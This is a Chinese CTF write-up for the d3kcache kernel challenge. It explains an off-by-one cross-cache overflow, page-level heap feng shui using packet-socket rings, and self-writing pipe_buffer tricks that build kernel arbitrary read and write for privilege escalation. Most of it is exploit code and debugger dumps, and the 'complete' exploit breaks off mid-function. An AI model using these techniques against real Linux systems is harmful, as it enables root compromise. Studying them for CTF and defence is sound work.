0%

页级堆风水+自写管道

d3kcache

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash
# Boot the challenge kernel (bzImage) with rootfs.img under QEMU.
#   -m 256M, -smp cores=2,threads=2 : guest memory and CPU topology
#   -cpu kvm64,+smep,+smap          : guest CPU model with SMEP and SMAP enabled
#   -append "... kaslr pti=on ..."  : kernel command line enabling KASLR and PTI;
#                                     oops=panic panic=1 turns any oops into a panic
#   -snapshot                       : changes to rootfs.img are not written back
#   -no-reboot                      : QEMU exits instead of rebooting the guest
#   -s                              : QEMU shorthand for -gdb tcp::1234 (debug stub)
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-hda ./rootfs.img \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 root=/dev/sda rw rdinit=/sbin/init kaslr pti=on quiet oops=panic panic=1" \
-no-reboot \
-s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/sh
# Guest init script: fix ownership, mount pseudo-filesystems, load the
# challenge module, then drop the player into a shell as user "ctf".

# Everything belongs to root except /home/ctf; the flag is root-only (0600).
chown -R root:root /
chmod 700 /root
chown -R ctf:ctf /home/ctf
chown root:root /root/flag
chmod 600 /root/flag

# Pseudo-filesystems needed by the userland.
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mkdir /dev/pts
mount -t devpts devpts /dev/pts

# Turn on dmesg_restrict and kptr_restrict.
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict

# Load the challenge module and make its device node world read/writable.
insmod /root/d3kcache.ko
chmod 666 /dev/d3kcache

cat /root/banner
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

# Player shell runs as the unprivileged "ctf" user.
cd /home/ctf
setsid cttyhack su ctf -c /bin/sh
#setsid cttyhack setuidgid 1000 sh

# Power the guest off once the shell exits.
poweroff -d 0 -f
  • dmesg_restrict
  • kptr_restrict
1
2
3
4
CONFIG_CFI_CLANG=y # 开启Control-Flow Integrity控制流完整性(内核ROP失效)
CONFIG_MEMCG=y # 开启内存控制器(GFP_KERNEL和GFP_ACCOUNT之间存在隔离)
CONFIG_SLAB_FREELIST_RANDOM=y # 开启slab freelist随机化
CONFIG_SLAB_FREELIST_HARDENED=y

漏洞分析

漏洞点如下:

1
2
3
4
5
if ( !copy_from_user(kdata, ptr, size) )
{
kdata[size] = 0; // 末尾置空,off-by-one
re = 0LL;
}
  • 内核 off-by-one

程序的 kmem_cache 是独立的:

1
2
3
4
5
6
7
if ( (unsigned __int64)module_device < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A66);
spin = 0;
kcache_jar = kmem_cache_create_usercopy("kcache_jar", 2048LL, 0LL, 67379200LL, 0LL, 2048LL, 0LL);
memset(kcache_list, 0, 0x100uLL);
}
  • 只能考虑 cross-cache overflow

页级堆风水

页级堆风水即以内存页为粒度的内存排布方式,这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布

从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:

  • 向 buddy system 请求两份连续的内存页
  • 释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页
  • 释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页

接下来利用内核模块的 off-by-one 就可能溢出到其他的内核结构体上

可以使用如下方案来构建页级堆风水:

  • 创建一个 protocol 为 PF_PACKET 的 socket
  • 调用 setsockopt 将 PACKET_VERSION 设为 TPACKET_V1 或者 TPACKET_V2
  • 调用 setsockopt 提交一个 PACKET_TX_RING

此时便存在如下调用链:

1
__sys_setsockopt() -> sock->ops->setsockopt() -> packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Allocate the block vector for a packet ring (quoted kernel code).
 *
 * One struct pgv is allocated per block (req->tp_block_nr entries), and each
 * entry's buffer is filled by alloc_one_pg_vec_page(order).
 *
 * Returns the vector on success. Returns NULL if the vector itself cannot be
 * allocated, or if any block allocation fails; in the latter case the vector
 * is handed to free_pg_vec() before returning.
 */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

/* zeroed array of block_nr descriptors */
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

/* one page-allocator request per block */
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • 用以分配 tp_block_nr 份 2^order 大小的内存页(其中 order 由 tp_block_size 决定)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Allocate the buffer for a single ring block (quoted kernel code).
 *
 * Attempts, in order:
 *   1. __get_free_pages(order) with __GFP_NORETRY set;
 *   2. vzalloc() of (1 << order) * PAGE_SIZE bytes;
 *   3. __get_free_pages(order) again with __GFP_NORETRY cleared.
 *
 * Returns the buffer, or NULL if all three attempts fail.
 */
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}
  • 直接调用 __get_free_pages() 向 buddy system 请求内存页,因此可以利用该函数进行大量的页面请求

自写管道

当我们创建一个管道时,在内核中会生成16个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object

1
2
3
4
5
6
7
/* Descriptor for one slot of a pipe's ring (quoted kernel struct). */
struct pipe_buffer {
struct page *page; /* first member; this write-up targets it with the overflow */
unsigned int offset, len; /* NOTE(review): presumably data start and length within the page — confirm against the kernel header */
const struct pipe_buf_operations *ops; /* operations table pointer */
unsigned int flags;
unsigned long private;
};
  • pipe 系统调用提供了 fcntl(F_SETPIPE_SZ) 让我们可以重新分配 pipe_buffer 并指定其数量

自写管道的核心就是劫持 pipe_buffer->page,使该 page 结构体映射 pipe_buffer 本身所在的物理页面,通过多个这样的自写管道就可以构造出一个近乎无限制的任意读写系统

内核结构体 pipe_buffer 的第一个条目为 page,覆盖其低位就可能导致 page 重叠:

  • 覆盖低位后,pipe_buffer1-1->page 与 pipe_buffer1-2->page 指向同一个 page

1700041832088

接下来就可以利用 UAF pipe_buffer 来泄露数据:

  • 释放 UAF pipe_buffer(4k的缓冲页也会被释放,释放之后数据不会清除仍然可读写)
  • 使用 fcntl(F_SETPIPE_SZ) 重新分配 pipe_buffer,部分的 pipe_buffer 就会被申请到之前我们释放的4k缓冲页上
  • 利用 UAF 对4k缓冲页进行读取就可以泄露地址

1700043734977

修改可控的 pipe_buffer2->page,即可完成二级 UAF:

  • 利用之前的 UAF 可以修改 pipe_buffer2-1->page,使 pipe_buffer2-1->page 与 pipe_buffer2-2->page 指向同一个 page,构成二级 UAF

1700044287875

用同样的方法将 pipe_buffer3 申请到4k缓冲页上,并利用二级 UAF 将 pipe_buffer3->page 覆盖为 pipe_buffer2->page

  • 由于 pipe_buffer2->page 映射 pipe_buffer3 所在的物理页面,现在 pipe_buffer3 成为 self-writing pipe

1700045029863

接着构造另外两个 self-writing pipe,直到将3个 pipe_buffer 修改为 self-writing pipe(执行 write(pipe_list[target][1]) 可以修改 pipe_buffer 本身)

  • 这3个 self-writing pipe 在同一个页面上,并且它们的 pipe_buffer->page 都映射这个页面

之后就可以进行 RAA 和 WAA 了,这里我们使用三个管道:

  • self-writing pipe1:用以进行内存空间中的任意读写,我们通过修改其 page 指针完成
  • self-writing pipe2:用以修改 self-writing pipe3,使其写入的起始位置指向 self-writing pipe1
  • self-writing pipe3:用以修改 self-writing pipe1 与 self-writing pipe2,使得 self-writing pipe1 的 page 指针指向指定位置,self-writing pipe2 的写入起始位置指向 self-writing pipe3

入侵思路

先利用 setsockopt 构建好页级堆风水

在准备阶段,分别通过 socket 部署好大量 order-0(1 页)、order-2(4 页)、order-3(8 页)的页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/*
 * Pre-spray packet-ring blocks of three sizes (1, 4 and 8 pages each).
 *
 * Slots [0, PGV_1PAGE_SPRAY_NUM) hold single-page blocks, slots starting at
 * PGV_4PAGES_START_IDX hold 4-page blocks and slots starting at
 * PGV_8PAGES_START_IDX hold 8-page blocks. A failed alloc_page() is only
 * reported (with the loop-relative index); spraying continues regardless.
 */
void prepare_pgv_pages(void)
{
/**
* The later steps want clean, contiguous order-3 memory, so allocations made
* as a side effect of the order-3 spray itself should not disturb it.
* Smaller blocks are sprayed first and handed back while spraying so that
* those side-effect allocations have pages to take.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8-page blocks; these are the ones used for the page-level feng shui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* each socket takes one sock_inode_cache object; 19 objects fit in one
 * 4-page slab, so release one 4-page block every 19 sockets */
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* each socket takes one dentry; 21 objects fit in one 1-page slab, so
 * release a 1-page block every 21 sockets (the index is advanced by 2
 * before the free) */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* each pgv array takes one kmalloc-8 object; 512 objects fit in one
 * 1-page slab, so release a 1-page block every 512 sockets */
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}
  • alloc_page 用于申请页面
  • free_page 用于释放页面

先释放高阶的页面,然后申请低阶的页面,在伙伴系统的分配下低阶页面大概率是物理连续的

利用这个方法部署连续的 pipe_buffer,然后在中间镶嵌一段内核模块申请的可控页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

触发 off-by-one,大概率会触发 cross-cache overflow 进而覆盖 pipe_buffer->page 的低位

此时两个 pipe_buffer->page 指向同一个 page,可以利用上述方法构造3个自写管道(详情见之前的博客)

构造完成后,调试信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
00:0000│ 0xffff888007267000 —▸ 0xffffea00001c9180 ◂— 0xfffffc0000000
01:0008│ 0xffff888007267008 ◂— 0x24 /* '$' */
02:0010│ 0xffff888007267010 ◂— 0x0
03:0018│ 0xffff888007267018 ◂— 0x10
04:0020│ 0xffff888007267020 ◂— 0x0
... ↓ 3 skipped
08:0040│ 0xffff888007267040 ◂— 0x0
... ↓ 7 skipped
10:0080│ 0xffff888007267080 ◂— 0x0
... ↓ 7 skipped
18:00c0│ 0xffff8880072670c0 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe1 */
19:00c8│ 0xffff8880072670c8 ◂— 0xb8000000c8
1a:00d0│ 0xffff8880072670d0 —▸ 0xffffffff82451b30 ◂— 0x0
1b:00d8│ 0xffff8880072670d8 ◂— 0x10
1c:00e0│ 0xffff8880072670e0 ◂— 0x0
1d:00e8│ 0xffff8880072670e8 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
20:0100│ 0xffff888007267100 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
28:0140│ 0xffff888007267140 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
30:0180│ 0xffff888007267180 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe2 */
31:0188│ 0xffff888007267188 ◂— 0x240
32:0190│ 0xffff888007267190 —▸ 0xffffffff82451b30 ◂— 0x0
33:0198│ 0xffff888007267198 ◂— 0x10
34:01a0│ 0xffff8880072671a0 ◂— 0x0
35:01a8│ 0xffff8880072671a8 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 2 skipped
38:01c0│ 0xffff8880072671c0 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
40:0200│ 0xffff888007267200 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
48:0240│ 0xffff888007267240 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe3 */
49:0248│ 0xffff888007267248 ◂— 0xe0000000c8
4a:0250│ 0xffff888007267250 —▸ 0xffffffff82451b30 ◂— 0x0
  • self-writing pipe1:偏移为 0xc0
  • self-writing pipe2:偏移为 0x180
  • self-writing pipe3:偏移为 0x240

构造好 RAA 与 WAA 原语后,便可以从后往前扫描内存,同时泄露 vmemmap_base 与 kernel_base

进行任意读写之前,都需要先将直接映射区(direct mapping)地址转化为对应 page 结构体的地址,转换函数如下:

1
2
3
4
5
6
7
8
/*
 * Map an address inside the direct mapping to the address of its struct page
 * entry: take the 4 KiB page index relative to page_offset_base and index
 * the vmemmap array with it (0x40 bytes per entry).
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_start = direct_map_addr & (~0xfff);
    size_t page_index = (page_start - page_offset_base) / 0x1000;

    return vmemmap_base + page_index * 0x40;
}

从前往后扫描内存,查找并尝试将 current_task->cred 覆盖为 init_cred

  • 调试时可以通过解引用 task_struct->parent(offset=309*8) 的方式向上一直找到 init 进程(init->parent 指向自身,利用这一点可以定位 init 进程)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PIPE_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000] = {'\0'};

int pipe_list[PIPE_NUM][2];

int fd;
struct argg {
int index;
int size;
char* data;
};

int add(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x114, &arg);
}

int dele(int index){
struct argg arg = {.index = index};
return ioctl(fd, 0x810, &arg);
}

int kwrite(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x514, &arg);
}

int kread(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x1919, &arg);
}

/*
 * Read through the pipe at self_2nd_pipe_idx after pointing its fake
 * pipe_buffer at `page_to_read`.
 *
 * page_to_read: struct page address stored into evil_2nd_buf.page.
 * dst:          destination buffer; 0xfff bytes are requested, so it must
 *               have room for at least that many.
 *
 * The write() calls are order-dependent and none of their results are checked.
 * NOTE(review): relies on the offsets prepared in main() for evil_3rd_buf and
 * evil_4th_buf — confirm before reordering anything here.
 */
void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
/* fake descriptor: start of the target page, 0x1ff8 bytes marked readable */
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

/* via the 3rd pipe: write the prepared evil_4th_buf descriptor */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* via the 4th pipe: the new evil_2nd_buf, then zero padding up to TRD_PIPE_BUF_SZ */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* via the 4th pipe again: the prepared evil_3rd_buf descriptor */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* finally pull the data out through the 2nd pipe */
read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff);
}

/*
 * Write `len` bytes from `src` through the pipe at self_2nd_pipe_idx after
 * pointing its fake pipe_buffer at `page_to_write`.
 *
 * page_to_write: struct page address stored into evil_2nd_buf.page.
 * src, len:      data handed to the final write().
 *
 * The write() calls are order-dependent and none of their results are checked.
 * NOTE(review): relies on the offsets prepared in main() for evil_3rd_buf and
 * evil_4th_buf — confirm before reordering anything here.
 */
void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
/* fake descriptor: start of the target page, currently empty (len = 0) */
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* via the 3rd pipe: write the prepared evil_4th_buf descriptor */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* via the 4th pipe: the new evil_2nd_buf, then zero padding up to TRD_PIPE_BUF_SZ */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* via the 4th pipe again: the prepared evil_3rd_buf descriptor */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* finally push the caller's data through the 2nd pipe */
write(pipe_list[self_2nd_pipe_idx][1], src, len);
}

int main(int argc , char **argv, char **envp){
char buf[0x1000]= {'\0'};
save_status();
bind_core(0);
unshare_setup();

fd = open("/dev/d3kcache", O_RDWR);
if (fd < 0)
err_exit("open /dev/d3kcache");

prepare_pgv_system();
prepare_pgv_pages();

for(int i = 0; i < PIPE_NUM; i++){
if(pipe(pipe_list[i]) == -1){
err_exit("pipe");
}
}

for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_list[i][1], "AAAAAAAA", 8); // tag
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], "AAAAAAAA", 8);
write(pipe_list[i][1], "BBBBBBBB", 8);
}

memset(buf, 0, sizeof(buf));
for (int i = 0; i < 0x10; i++) {
kwrite(i, 0x2048 - 8, buf);
}

int victim_idx = -1;
int orig_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){
char tag[0x10];
int nr;
memset(tag, 0, sizeof(tag));
read(pipe_list[i][0], tag, 8);
read(pipe_list[i][0], &nr, sizeof(int));
if (!strcmp(tag, "AAAAAAAA") && nr != i){
orig_idx = nr;
victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
}
}
if (orig_idx == -1 || victim_idx == -1){
err_exit("can't find");
}

struct pipe_buffer info_pipe_buf;
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf,'p',sizeof(buf));
write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
close(pipe_list[orig_idx][0]); /* 释放其中一个pipe_buffer */
close(pipe_list[orig_idx][1]);

//sleep(2);

puts("write down");

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx){
continue;
}
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
/* 2 * pipe_buffer = 0x60 kmalloc-96 */
err_exit("Fcntl Pipe");
}
}

memset(buf,0,sizeof(buf));
read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
print_hex(buf,SND_PIPE_BUF_SZ - 8);
read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
puts("change pipe_buffer down");

//sleep(2);

int snd_orig_idx = -1;
int snd_victim_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){ /* 第二次堆喷 */
int nr;
if (i == orig_idx || i == victim_idx){
continue;
}
read(pipe_list[i][0], &nr, sizeof(int));
if (i < PIPE_NUM && i != nr){
snd_orig_idx = nr;
snd_victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
}
}

if (snd_orig_idx == -1 || snd_victim_idx == -1){
err_exit("can't find");
}

size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf,'k',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
close(pipe_list[snd_orig_idx][0]);
close(pipe_list[snd_orig_idx][1]);

puts("write down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
/* 4 * pipe_buffer = 0xc0 kmalloc-192 */
err_exit("Fcntl Pipe");
}
}

puts("fcntl down");
//sleep(2);

evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_2nd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
self_2nd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'n',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_3rd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'m',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_4th_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_idx);
break;
}
}

memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;

//sleep(2);
